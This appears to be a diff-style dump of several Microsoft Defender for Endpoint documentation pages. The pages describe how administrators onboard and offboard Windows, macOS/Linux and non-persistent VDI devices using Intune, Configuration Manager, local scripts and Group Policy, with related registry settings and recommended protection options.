- - OMA-URI: ./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/Offboarding
- - Date type: String
- - Value: [Copy and paste the value from the content of the WindowsDefenderATP_valid_until_YYYY-MM-DD.offboarding file]
-
-For more information on Microsoft Intune policy settings, see [Windows 10 policy settings in Microsoft Intune](/mem/intune/configuration/custom-settings-windows-10).
-
-> [!NOTE]
-> The **Health Status for offboarded devices** policy uses read-only properties and can't be remediated.
-
-> [!IMPORTANT]
-> Offboarding causes the device to stop sending sensor data to the portal but data from the device, including reference to any alerts it has had will be retained for up to 6 months.
-
-## Related articles
--- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md)-- [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)-- [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-
security Configure Endpoints Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md
- Title: Onboard non-Windows devices to the Microsoft Defender for Endpoint service
-description: Configure non-Windows devices so that they can send sensor data to the Microsoft Defender for Endpoint service.
------- m365-security-- tier1-- Previously updated : 01/18/2024--
-# Onboard non-Windows devices
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-**Platforms**
-- macOS-- Linux-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-nonwindows-abovefoldlink)
-
-Defender for Endpoint provides a centralized security operations experience for Windows and non-Windows platforms. You'll be able to see alerts from various supported operating systems (OS) in Microsoft Defender XDR and better protect your organization's network.
-
-You'll need to know the exact Linux distros and macOS versions that are compatible with Defender for Endpoint for the integration to work. For more information, see:
--- [Microsoft Defender for Endpoint on Linux system requirements](microsoft-defender-endpoint-linux.md#system-requirements)-- [Microsoft Defender for Endpoint on macOS system requirements](microsoft-defender-endpoint-mac.md#system-requirements).-
-## Onboarding non-Windows devices
-
-You can choose to onboard non-Windows devices through Microsoft Defender for Endpoint or through a third-party solution.
--
-You'll need to take the following steps:
-
-1. Select your preferred method of onboarding:
- - To onboard macOS devices using Microsoft Defender for Endpoint, see [Microsoft Defender for Endpoint on Mac](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac).
- - To onboard Linux devices using Microsoft Defender for Endpoint, see [Microsoft Defender for Endpoint on Linux](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-linux).
- - To onboard non-windows devices using third party solution:
- 1. In the navigation pane, select **Partners and APIs > Connected Applications**. Make sure the third-party solution is listed.
- 2. In the **Connected Applications** page, select the partner that supports your non-Windows devices.
- 3. Select **View** to open the partner's page. Follow the instructions provided on the page.
- 4. After creating an account or subscribing to the partner solution, you should get to a stage where a tenant Global Admin in your organization is asked to accept a permission request from the partner application. Read the permission request carefully to make sure that it's aligned with the service that you require.
-
-2. Run a detection test by following the instructions of the third-party solution.
-
-## Offboard non-Windows devices
-
-For macOS and Linux devices, you can choose to offboard through Microsoft Defender for Endpoint. In the navigation pane, select **Settings** > **Offboard** > **Select Operating System to start the offboarding Process**.
-
-For details on offboarding Microsoft Defender on macOS, see [Uninstalling Microsoft Defender for macOS](mac-resources.md).
-
-You can also offboard non-Windows devices by disabling the third-party integration. Enable coverage for devices running non-Windows platforms by [integrating third-party solutions](https://security.microsoft.com/interoperability/partners).
-
-## Related topics
--- [Onboard Windows devices](configure-endpoints.md)-- [Onboard servers](configure-server-endpoints.md)-- [Configure proxy and Internet connectivity settings](configure-proxy-internet.md)-- [Troubleshooting Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-
security Configure Endpoints Sccm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-sccm.md
- Title: Onboard Windows devices using Configuration Manager
-description: Use Configuration Manager to deploy the configuration package on devices so that they are onboarded to the Defender for Endpoint service.
------- m365-security-- tier1-- Previously updated : 09/22/2021---
-# Onboard Windows devices using Configuration Manager
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Configuration Manager current branch-- System Center 2012 R2 Configuration Manager-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configureendpointssccm-abovefoldlink)
-
-## Prerequisites
-- [Endpoint Protection point site system role](/mem/configmgr/protect/deploy-use/endpoint-protection-site-role)-
-> [!IMPORTANT]
-> The Endpoint Protection point site system role is required so that antivirus and attack surface reduction policies are properly deployed to the targeted endpoints. Without this role, the endpoints in the device collection won't receive the configured antivirus and attack surface reduction policies.
-
-You can use Configuration Manager to onboard endpoints to the Microsoft Defender for Endpoint service.
-
-There are several options you can use to onboard devices using Configuration
-- [Onboard devices using System Center Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection)-- [Tenant attach](/mem/configmgr/tenant-attach/endpoint-security-get-started)---
-For Windows Server 2012 R2 and Windows Server 2016 - after completing the onboarding steps, you'll need to [Configure and update System Center Endpoint Protection clients](onboard-downlevel.md#configure-and-update-system-center-endpoint-protection-clients).
-
-> [!NOTE]
-> Defender for Endpoint doesn't support onboarding during the [Out-Of-Box Experience (OOBE)](/windows-hardware/test/assessments/out-of-box-experience) phase. Make sure users complete OOBE after running Windows installation or upgrading.
->
-> Note that it's possible to create a detection rule on a Configuration Manager application to continuously check if a device has been onboarded. An application is a different type of object than a package and program.
-> If a device is not yet onboarded (due to pending OOBE completion or any other reason), Configuration Manager will retry to onboard the device until the rule detects the status change.
->
-> This behavior can be accomplished by creating a detection rule checking if the "OnboardingState" registry value (of type REG_DWORD) = 1.
-> This registry value is located under "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status".
-For more information, see [Configure Detection Methods in System Center 2012 R2 Configuration Manager](/previous-versions/system-center/system-center-2012-R2/gg682159\(v=technet.10\)#step-4-configure-detection-methods-to-indicate-the-presence-of-the-deployment-type).
-
-### Configure sample collection settings
-
-For each device, you can set a configuration value to state whether samples can be collected from the device when a request is made through Microsoft Defender XDR to submit a file for deep analysis.
-
-> [!NOTE]
-> These configuration settings are typically done through Configuration Manager.
-
-You can set a compliance rule for configuration item in Configuration Manager to change the sample share setting on a device.
-
-This rule should be a *remediating* compliance rule configuration item that sets the value of a registry key on targeted devices to make sure they're compliant.
-
-The configuration is set through the following registry key entry:
-
-```text
-Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
-Name: "AllowSampleCollection"
-Value: 0 or 1
-```
-
-Where Key type is a D-WORD. Possible values are:
--- 0: Doesn't allow sample sharing from this device-- 1: Allows sharing of all file types from this device-
-The default value in case the registry key doesn't exist is 1.
-
-For more information about System Center Configuration Manager Compliance, see [Introduction to compliance settings in System Center 2012 R2 Configuration Manager](/previous-versions/system-center/system-center-2012-R2/gg682139\(v=technet.10\)).
-
-### Onboard Windows devices using Microsoft Configuration Manager
-
-### Collection creation
-
-To onboard Windows devices with Microsoft Configuration Manager, the deployment can target an existing collection or a new collection can be created for testing.
-
-Onboarding using tools such as Group Policy or a manual method doesn't install any agents on the system.
-
-Within the Microsoft Configuration Manager console, the onboarding process will be configured as part of the compliance settings within the console.
-
-Any system that receives this required configuration maintains that configuration for as long as the Configuration Manager client continues to receive this policy from the management point.
-
-Follow these steps to onboard endpoints using Microsoft Configuration
-
-1. In the Microsoft Configuration Manager console, navigate to **Assets and Compliance \> Overview \> Device Collections**.
-
- :::image type="content" source="media/configmgr-device-collections.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard1." lightbox="media/configmgr-device-collections.png":::
-
-2. Select and hold (or right-click) **Device Collection** and select **Create Device Collection**.
-
- :::image type="content" source="media/configmgr-create-device-collection.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard2." lightbox="media/configmgr-create-device-collection.png":::
-
-3. Provide a **Name** and **Limiting Collection**, then select **Next**.
-
- :::image type="content" source="media/configmgr-limiting-collection.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard3." lightbox="media/configmgr-limiting-collection.png":::
-
-4. Select **Add Rule** and choose **Query Rule**.
-
- :::image type="content" source="media/configmgr-query-rule.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard4." lightbox="media/configmgr-query-rule.png":::
-
-5. Select **Next** on the **Direct Membership Wizard** and then select **Edit Query Statement**.
-
- :::image type="content" source="media/configmgr-direct-membership.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard5." lightbox="media/configmgr-direct-membership.png":::
-
-6. Select **Criteria** and then choose the star icon.
-
- :::image type="content" source="media/configmgr-criteria.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard6." lightbox="media/configmgr-criteria.png":::
-
-7. Keep criterion type as **simple value**, choose whereas **Operating System - build number**, operator as **is greater than or equal to** and value **14393**, and select **OK**.
-
- :::image type="content" source="media/configmgr-simple-value.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard7." lightbox="media/configmgr-simple-value.png":::
-
-8. Select **Next** and **Close**.
-
- :::image type="content" source="media/configmgr-membership-rules.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard8." lightbox="media/configmgr-membership-rules.png":::
-
-9. Select **Next**.
-
- :::image type="content" source="media/configmgr-confirm.png" alt-text="Screenshot of the Microsoft Configuration Manager wizard9." lightbox="media/configmgr-confirm.png":::
-
-After completing this task you have a device collection with all the Windows endpoints in the environment.
-
-## Other recommended configuration settings
-
-After onboarding devices to the service, it's important to take advantage of the included threat protection capabilities by enabling them with the following recommended configuration settings.
-
-### Device collection configuration
-
-If you're using Configuration Manager, version 2002 or later, you can choose to broaden the deployment to include servers or down-level clients.
-
-### Next generation protection configuration
-
-The following configuration settings are recommended:
-
-#### Scan
--- Scan removable storage devices such as USB drives: Yes-
-#### Real-time Protection
--- Enable Behavioral Monitoring: Yes-- Enable protection against Potentially Unwanted Applications at download and prior to installation: Yes-
-#### Cloud Protection Service
--- Cloud Protection Service membership type: Advanced membership-
-#### Attack surface reduction
-
-Configure all available rules to Audit.
-
-> [!NOTE]
-> Blocking these activities may interrupt legitimate business processes. The best approach is setting everything to audit, identifying which ones are safe to turn on, and then enabling those settings on endpoints which do not have false positive detections.
-
-For deploying Microsoft Defender Antivirus and attack surface reduction policies through Microsoft Configuration Manager (SCCM) follow the steps:
--- Enable Endpoint Protection and configure custom client settings.-- Install the Endpoint Protection client from a command prompt.-- Verify the Endpoint Protection client installation.-
-##### Enable Endpoint Protection and configure custom client settings
-Follow the steps to enable endpoint protection and configuration of custom client settings:
-
-1. In the Configuration Manager console, click **Administration.**
-1. In the **Administration** workspace, click **Client Settings.**
-1. On the **Home** tab, in the **Create** group, click **Create Custom Client Device Settings.**
-1. In the **Create Custom Client Device Settings** dialog box, provide a name and a description for the group of settings, and then select **Endpoint Protection.**
-1. Configure the Endpoint Protection client settings that you require. For a full list of Endpoint Protection client settings that you can configure, see the Endpoint Protection section in [About client settings.](/mem/configmgr/core/clients/deploy/about-client-settings#endpoint-protection)
-
- > [!IMPORTANT]
- > Install the Endpoint Protection site system role before you configure client settings for Endpoint Protection.
-
-1. Click **OK** to close the **Create Custom Client Device Settings** dialog box. The new client settings are displayed in the **Client Settings** node of the **Administration** workspace.
-1. Next, deploy the custom client settings to a collection. Select the custom client settings you want to deploy. In the **Home** tab, in the **Client Settings** group, click **Deploy.**
-1. In the **Select Collection** dialog box, choose the collection to which you want to deploy the client settings and then click **OK.** The new deployment is shown in the **Deployments** tab of the details pane.
-
-Clients are configured with these settings when they next download client policy. For more information, see [Initiate policy retrieval for a Configuration Manager client.](/mem/configmgr/core/clients/manage/manage-clients)
--
-##### Installation of Endpoint Protection client from a command prompt
-Follow the steps to complete installation of endpoint protection client from the command prompt.
-
-1. Copy **scepinstall.exe** from the **Client** folder of the Configuration Manager installation folder to the computer on which you want to install the Endpoint Protection client software.
-1. Open a command prompt as an administrator. Change directory to the folder with the installer. Then run ```scepinstall.exe```, adding any extra command-line properties that you require:
-
- |**Property** |**Description** |
- |||
- |```/s``` |Run the installer silently|
- |```/q``` |Extract the setup files silently|
- |```/i``` |Run the installer normally|
- |```/policy``` |Specify an antimalware policy file to configure the client during installation|
- |```/sqmoptin```|Opt-in to the Microsoft Customer Experience Improvement Program (CEIP)|
-
-1. Follow the on-screen instructions to complete the client installation.
-1. If you downloaded the latest update definition package, copy the package to the client computer, and then double-click the definition package to install it.
-
- > [!NOTE]
- > After the Endpoint Protection client install completes, the client automatically performs a definition update check. If this update check succeeds, you don't have to manually install the latest definition update package.
-
-**Example: install the client with an antimalware policy**
-
-```scepinstall.exe /policy <full path>\<policy file>```
-
-##### Verify the Endpoint Protection client installation
-
-After you install the Endpoint Protection client on your reference computer, verify that the client is working correctly.
-
-1. On the reference computer, open **System Center Endpoint Protection** from the Windows notification area.
-1. On the **Home** tab of the **System Center Endpoint Protection** dialog box, verify that **Real-time protection** is set to **On.**
-1. Verify that **up to date** is displayed for **Virus and spyware definitions.**
-1. To make sure that your reference computer is ready for imaging, under **Scan options,** select **Full,** and then click **Scan now.**
--
-#### Network protection
-
-Prior to enabling network protection in audit or block mode, ensure that you've installed the antimalware platform update, which can be obtained from the [support page](https://support.microsoft.com/help/4560203/windows-defender-anti-malware-platform-binaries-are-missing).
-
-#### Controlled folder access
-
-Enable the feature in audit mode for at least 30 days. After this period, review detections and create a list of applications that are allowed to write to protected directories.
-
-For more information, see [Evaluate controlled folder access](evaluate-controlled-folder-access.md).
-
-## Run a detection test to verify onboarding
-
-After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
-
-## Offboard devices using Configuration Manager
-
-For security reasons, the package used to Offboard devices will expire 30 days after the date it was downloaded. Expired offboarding packages sent to a device will be rejected. When downloading an offboarding package, you will be notified of the packages expiry date and it will also be included in the package name.
-
-> [!NOTE]
-> Onboarding and offboarding policies must not be deployed on the same device at the same time, otherwise this will cause unpredictable collisions.
-
-### Offboard devices using Microsoft Configuration Manager current branch
-
-If you use Microsoft Configuration Manager current branch, see [Create an offboarding configuration file](/configmgr/protect/deploy-use/windows-defender-advanced-threat-protection#create-an-offboarding-configuration-file).
-
-### Offboard devices using System Center 2012 R2 Configuration Manager
-
-1. Get the offboarding package from <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
- 1. In the navigation pane, select **Settings** \> **Endpoints** \> **Device management** \> **Offboarding**.
- 1. Select Windows 10 or Windows 11 as the operating system.
- 1. In the **Deployment method** field, select **System Center Configuration Manager 2012/2012 R2/1511/1602**.
- 1. Select **Download package**, and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that can be accessed by the network administrators who will deploy the package. You should have a file named *WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd*.
-
-3. Deploy the package by following the steps in the [Packages and Programs in System Center 2012 R2 Configuration Manager](/previous-versions/system-center/system-center-2012-R2/gg699369\(v=technet.10\)) article.
-
- Choose a predefined device collection to deploy the package to.
-
-> [!IMPORTANT]
-> Offboarding causes the device to stop sending sensor data to the portal but data from the device, including reference to any alerts it has had will be retained for up to 6 months.
-
-## Monitor device configuration
-
-If you're using Microsoft Configuration Manager current branch, use the built-in Defender for Endpoint dashboard in the Configuration Manager console. For more information, see [Defender for Endpoint - Monitor](/configmgr/protect/deploy-use/windows-defender-advanced-threat-protection#monitor).
-
-If you're using System Center 2012 R2 Configuration Manager, monitoring consists of two parts:
-
-1. Confirming the configuration package has been correctly deployed and is running (or has successfully run) on the devices in your network.
-
-2. Checking that the devices are compliant with the Defender for Endpoint service (this ensures the device can complete the onboarding process and can continue to report data to the service).
-
-### Confirm the configuration package has been correctly deployed
-
-1. In the Configuration Manager console, click **Monitoring** at the bottom of the navigation pane.
-
-2. Select **Overview** and then **Deployments**.
-
-3. Select on the deployment with the package name.
-
-4. Review the status indicators under **Completion Statistics** and **Content Status**.
-
- If there are failed deployments (devices with **Error**, **Requirements Not Met**, or **Failed statuses**), you may need to troubleshoot the devices. For more information, see, [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md).
-
- :::image type="content" source="media/sccm-deployment.png" alt-text="The Configuration Manager showing successful deployment with no errors" lightbox="media/sccm-deployment.png":::
-
-### Check that the devices are compliant with the Microsoft Defender for Endpoint service
-
-You can set a compliance rule for configuration item in System Center 2012 R2 Configuration Manager to monitor your deployment.
-
-This rule should be a *non-remediating* compliance rule configuration item that monitors the value of a registry key on targeted devices.
-
-Monitor the following registry key entry:
-
-```console
-Path: "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"
-Name: "OnboardingState"
-Value: "1"
-```
-
-For more information, see [Introduction to compliance settings in System Center 2012 R2 Configuration Manager](/previous-versions/system-center/system-center-2012-R2/gg682139\(v=technet.10\)).
-
-## Related topics
-- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md)-- [Onboard Windows devices using a local script](configure-endpoints-script.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)-- [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)
security Configure Endpoints Script https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-script.md
- Title: Onboard Windows devices using a local script
-description: Use a local script to deploy the configuration package on devices to enable onboarding of the devices to the service.
-------- m365-security-- tier1--- Previously updated : 02/29/2024--
-# Onboard Windows devices using a local script
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configureendpointsscript-abovefoldlink)
-
-You can also manually onboard individual devices to Defender for Endpoint. You might want to onboard some devices when you're testing the service before you commit to onboarding all devices in your network.
-
-> [!IMPORTANT]
-> The script described in this article is recommended for manually onboarding devices to Defender for Endpoint. It should only be used on a limited number of devices. If you're deploying to a production environment, see [other deployment options](configure-endpoints.md), such as Intune, Group Policy, or Configuration Manager.
-
-Check out [Identify Defender for Endpoint architecture and deployment method](deployment-strategy.md) to see the various paths in deploying Defender for Endpoint.
-
-## Onboard devices
-
-1. Open the configuration package .zip file (*WindowsDefenderATPOnboardingPackage.zip*) that you downloaded from the service onboarding wizard. You can also get the package from <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 1. In the navigation pane, select **Settings** \> **Endpoints** \> **Device management** \> **Onboarding**.
-
- 2. Select Windows 10 or Windows 11 as the operating system.
-
- 3. In the **Deployment method** field, select **Local Script**.
-
- 4. Select **Download package** and save the .zip file.
-
-2. Extract the contents of the configuration package to a location on the device you want to onboard (for example, the Desktop). You should have a file named *WindowsDefenderATPLocalOnboardingScript.cmd*.
-
-3. Open an elevated command-line prompt on the device and run the script:
-
- 1. Go to **Start** and type **cmd**.
-
- 2. Right-click **Command prompt** and select **Run as administrator**.
-
- :::image type="content" source="media/run-as-admin.png" alt-text="The Window Start menu pointing to Run as administrator" lightbox="media/run-as-admin.png":::
-
-4. Type the location of the script file. If you copied the file to the desktop, type: `%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd`
-
-5. Press the **Enter** key or select **OK**.
-
-6. Type "Y" and enter when prompted.
-
-7. After the script completes, it will display "Press any key to continue...". Press any key to complete the steps on the device.
-
-For information on how you can manually validate that the device is compliant and correctly reports sensor data see, [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md).
-
-> [!TIP]
-> After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint endpoint](run-detection-test.md).
-
-## Configure sample collection settings
-
-For each device, you can set a configuration value to state whether samples can be collected from the device when a request is made through Microsoft Defender XDR to submit a file for deep analysis.
-
-You can manually configure the sample sharing setting on the device by using *regedit* or creating and running a `.reg` file.
-
-The configuration is set through the following registry key entry:
-
-```console
-Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
-Name: "AllowSampleCollection"
-Value: 0 or 1
-```
-
-Where Name type is a D-WORD. Possible values are:
--- 0 - doesn't allow sample sharing from this device-- 1 - allows sharing of all file types from this device-
-The default value in case the registry key doesn't exist is 1.
-
-## Run a detection test to verify onboarding
-
-After onboarding the device, you can choose to run a detection test to verify that a device is properly onboarded to the service. For more information, see [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md).
-
-## Offboard devices using a local script
-
-For security reasons, the package used to offboard devices expires three days after the date it was downloaded. Expired offboarding packages sent to a device are rejected. When downloading an offboarding package, you're notified of the package's expiry date, and that date is included in the package file name.
-
-> [!NOTE]
-> Onboarding and offboarding policies must not be deployed on the same device at the same time. Otherwise, unpredictable collisions might occur.
-
-1. Get the offboarding package from <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 1. In the navigation pane, select **Settings** \> **Endpoints** \> **Device management** \> **Offboarding**.
-
- 2. Select Windows 10 or Windows 11 as the operating system.
-
- 3. In the **Deployment method** field, select **Local Script**.
-
- 4. Select **Download package** and save the .zip file.
-
-2. Extract the contents of the .zip file to a shared, read-only location that devices can access. You should have a file named `WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd`.
-
-3. Open an elevated command-line prompt on the device and run the script:
-
- 1. Go to **Start** and type **cmd**.
-
- 2. Right-click **Command prompt** and select **Run as administrator**.
-
- :::image type="content" source="media/run-as-admin.png" alt-text="The Windows Start menu pointing to the Run as administrator option" lightbox="media/run-as-admin.png":::
-
-4. Type the location of the script file. If you copied the file to the desktop, type: `%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd`
-
-5. Press the **Enter** key or select **OK**.
-
-> [!IMPORTANT]
-> Offboarding causes the device to stop sending sensor data to the portal but data from the device, including reference to any alerts it has had will be retained for up to 6 months.
-
-## Monitor device configuration
-
-You can follow the different verification steps in the [Troubleshoot onboarding issues](troubleshoot-onboarding.md) to verify that the script completed successfully and the agent is running.
-
-Monitoring can also be done directly on the portal, or by using the different deployment tools.
-
-### Monitor devices using the portal
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-2. Select **Devices inventory**.
-
-3. Verify that devices are appearing.
-
-## Related articles
--- [Onboard Windows devices using Group Policy](configure-endpoints-gp.md)-- [Onboard Windows devices using Microsoft Endpoint Configuration Manager](configure-endpoints-sccm.md)-- [Onboard Windows devices using Mobile Device Management tools](configure-endpoints-mdm.md)-- [Onboard non-persistent virtual desktop infrastructure (VDI) devices](configure-endpoints-vdi.md)-- [Run a detection test on a newly onboarded Microsoft Defender for Endpoint device](run-detection-test.md)-- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-
security Configure Endpoints Vdi https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-vdi.md
- Title: Onboard non-persistent virtual desktop infrastructure (VDI) devices
-description: Deploy the configuration package on virtual desktop infrastructure (VDI) device so that they are onboarded to Microsoft Defender for Endpoint service.
-------- m365-security-- tier2-- Previously updated : 09/21/2023---
-# Onboard non-persistent virtual desktop infrastructure (VDI) devices in Microsoft Defender XDR
-
-Virtual desktop infrastructure (VDI) is an IT infrastructure concept that lets end users access enterprise virtual desktops instances from almost any device (such as your personal computer, smartphone, or tablet), eliminating the need for organization to provide users with physical machines. Using VDI devices reduce cost as IT departments are no longer responsible for managing, repairing, and replacing physical endpoints. Authorized users can access the same company servers, files, apps, and services from any approved device through a secure desktop client or browser.
-
-Like any other system in an IT environment, these too should have an Endpoint Detection and Response (EDR) and Antivirus solution to protect against advanced threats and attacks.
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Virtual desktop infrastructure (VDI) devices-- Windows 10, Windows 11, Windows Server 2019, Windows Server 2022, Windows Server 2008R2/2012R2/2016--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-configvdi-abovefoldlink)
-
- > [!NOTE]
- > **Persistent VDI's** - Onboarding a persistent VDI machine into Microsoft Defender for Endpoint is handled the same way you would onboard a physical machine, such as a desktop or laptop. Group policy, Microsoft Configuration Manager, and other methods can be used to onboard a persistent machine. In the Microsoft Defender portal, (https://security.microsoft.com) under onboarding, select your preferred onboarding method, and follow the instructions for that type. For more information see [Onboarding Windows client](onboard-windows-client.md).
-
-## Onboarding non-persistent virtual desktop infrastructure (VDI) devices
-
-Defender for Endpoint supports non-persistent VDI session onboarding.
-
-There might be associated challenges when onboarding VDI instances. The following are typical challenges for this scenario:
--- Instant early onboarding of a short-lived session, which must be onboarded to Defender for Endpoint prior to the actual provisioning.-- The device name is typically reused for new sessions.-
-In a VDI environment, VDI instances can have short lifespans. VDI devices can appear in the Microsoft Defender portal as either single entries for each VDI instance or multiple entries for each device.
--- Single entry for each VDI instance. If the VDI instance was already onboarded to Microsoft Defender for Endpoint, and at some point deleted, and then recreated with the same host name, a new object representing this VDI instance is NOT be created in the portal. -
- > [!NOTE]
- > In this case, the *same* device name must be configured when the session is created, for example using an unattended answer file.
--- Multiple entries for each device - one for each VDI instance.-
-> [!IMPORTANT]
-> If you're deploying non-persistent VDIs through cloning technology, make sure that your internal template VMs are not onboarded to Defender for Endpoint. This recommendation is to avoid cloned VMs from being onboarded with the same senseGuid as your template VMs, which could prevent VMs from showing up as new entries in the Devices list.
-
-The following steps guide you through onboarding VDI devices and highlight steps for single and multiple entries.
-
-> [!WARNING]
-> For environments where there are low resource configurations, the VDI boot procedure might slow the Defender for Endpoint sensor onboarding.
-
-### Onboarding steps
-
-> [!NOTE]
-> Windows Server 2016 and Windows Server 2012 R2 must be prepared by applying the installation package first using the instructions in [Onboard Windows servers](/microsoft-365/security/defender-endpoint/configure-server-endpoints#windows-server-2012-r2-and-windows-server-2016) for this feature to work.
-
-1. Open the VDI configuration package .zip file (*WindowsDefenderATPOnboardingPackage.zip*) that you downloaded from the service onboarding wizard. You can also get the package from the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>:
-
- 1. In the navigation pane, select **Settings** > **Endpoints** > **Device management** > **Onboarding**.
-
- 2. Select the operating system.
-
- 3. In the **Deployment method** field, select **VDI onboarding scripts for non-persistent endpoints**.
-
- 4. Click **Download package** and save the .zip file.
-
-2. Copy the files from the WindowsDefenderATPOnboardingPackage folder extracted from the .zip file into the golden/primary image under the path `C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup`.
-
- 1. If you are implementing multiple entries for each device - one for each session, copy WindowsDefenderATPOnboardingScript.cmd.
-
- 2. If you're implementing a single entry for each device, copy both Onboard-NonPersistentMachine.ps1 and WindowsDefenderATPOnboardingScript.cmd.
-
- > [!NOTE]
- > If you don't see the `C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup` folder, it might be hidden. You'll need to choose the **Show hidden files and folders** option from File Explorer.
-
-3. Open a Local Group Policy Editor window and navigate to **Computer Configuration** \> **Windows Settings** \> **Scripts** \> **Startup**.
-
- > [!NOTE]
- > Domain Group Policy may also be used for onboarding non-persistent VDI devices.
-
-4. Depending on the method you'd like to implement, follow the appropriate steps:
-
- - For single entry for each device:
-
- Select the **PowerShell Scripts** tab, then select **Add** (Windows Explorer opens directly in the path where you copied the onboarding script earlier). Navigate to onboarding PowerShell script `Onboard-NonPersistentMachine.ps1`. There's no need to specify the other file, as it is triggered automatically.
-
- - For multiple entries for each device:
-
- Select the **Scripts** tab, then click **Add** (Windows Explorer opens directly in the path where you copied the onboarding script earlier). Navigate to the onboarding bash script `WindowsDefenderATPOnboardingScript.cmd`.
-
-5. Test your solution:
-
- 1. Create a pool with one device.
-
